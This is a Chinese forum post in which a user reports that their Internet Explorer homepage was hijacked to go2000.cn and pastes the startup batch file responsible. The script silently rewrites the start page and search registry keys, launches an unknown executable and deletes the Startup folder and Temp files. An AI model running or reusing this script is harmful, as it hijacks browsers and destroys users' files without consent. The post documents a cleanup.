这两天上网,网页被强制改为
www.go2000.cn/ ,在internet 选项改了,开ie还是打开此网页,在注册表中搜索
www.go2000.cn 全改回后。重启又改回来了
查看启动加载项,发现加载个未知文件,auto.cmd 位置为 c:\windows\auto.cmd
内容如下:
@echo off
echo Windows Registry Editor Version 5.00 >> %temp%\temp.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] >> %temp%\temp.reg
echo "Start Page"="
http://www.go2000.cn/" >> %temp%\temp.reg
regedit /S %temp%\temp.reg
del %temp%\temp.reg
echo Windows Registry Editor Version 5.00 >> %temp%\temp.reg
echo [HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command] >> %temp%\temp.reg
echo @="\"C:\\Program Files\\Internet Explorer\\iexplore.exe\"
http://www.go2000.cn/">> %temp%\temp.reg
regedit /S %temp%\temp.reg
del %temp%\temp.reg
echo Windows Registry Editor Version 5.00 >> %temp%\temp.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{5B8225C7-757A-44B2-96BB-1E3AC529B03B}] >> %temp%\temp.reg
echo "DisplayName"="百度" >> %temp%\temp.reg
echo "URL"="
http://www.baidu.com/s?wd={searchTerms}&tn=golei_pg&cl=3&ie=utf-8" >> %temp%\temp.reg
echo "Codepage"=dword:0000fde9 >> %temp%\temp.reg
regedit /S %temp%\temp.reg
del %temp%\temp.reg
echo Windows Registry Editor Version 5.00 >> %temp%\temp.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes] >> %temp%\temp.reg
echo "DefaultScope"="{5B8225C7-757A-44B2-96BB-1E3AC529B03B}" >> %temp%\temp.reg
echo "Version"=dword:00000001 >> %temp%\temp.reg
regedit /S %temp%\temp.reg
del %temp%\temp.reg
start c:\windows\IEDrvS.exe
del /q "C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\*.*"
del /q "C:\WINDOWS\Temp\*.*"
删除此文件,问题解决。
想想准是,前几天朋友搜东西时中招。我一般不上网时,会把不用的软件全关掉的。
www.go2000.cn还真够无耻的。
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)附件:
Auto.rar 附件:
IEDrvS.rar